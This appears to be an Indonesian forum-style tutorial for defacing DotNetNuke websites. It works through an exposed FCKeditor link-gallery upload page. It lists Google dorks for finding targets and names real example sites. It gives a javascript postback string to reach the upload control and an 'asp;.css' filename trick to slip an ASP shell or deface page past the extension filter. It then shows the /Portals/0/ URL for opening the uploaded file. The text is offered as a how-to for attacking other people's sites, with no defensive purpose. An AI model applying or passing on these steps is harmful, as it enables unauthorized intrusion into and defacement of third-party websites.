DORK :
inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx
pilih salah satu dork nya,,
klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx
di sini saya menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target http://www.pivocom.com/ sebagai contohnya..
sehingga akan menjadi seperti ini :
"http://www.maautoronto.ca/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"
setelah nge klik itu, tnggu loading selesai baru kamu harus klik
"(File A file on your site)
dang anti alamat protocol website nya jadi :
"javascript:__doPostBack('ctlURL$cmdUpload','' )" => [ tanpa tanda kutip 2 ]
klo udah upload file yang pgn kamu masukin,,
file yang bisa di upload antara lain:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
tapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt
sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"
upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]
nah..abis itu kamu ganti alamat "http://www.maautoronto.ca/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi http://www.maautoronto.ca/Portals/0/index.asp;.css intinya kita harus menambahkan "portals/0/" pada akhir http://www.maautoronto.ca
Contoh : http://www.maautoronto.ca/Portals/0/index.asp;.css
Selamat Mencoba....
Sumber : MVPZ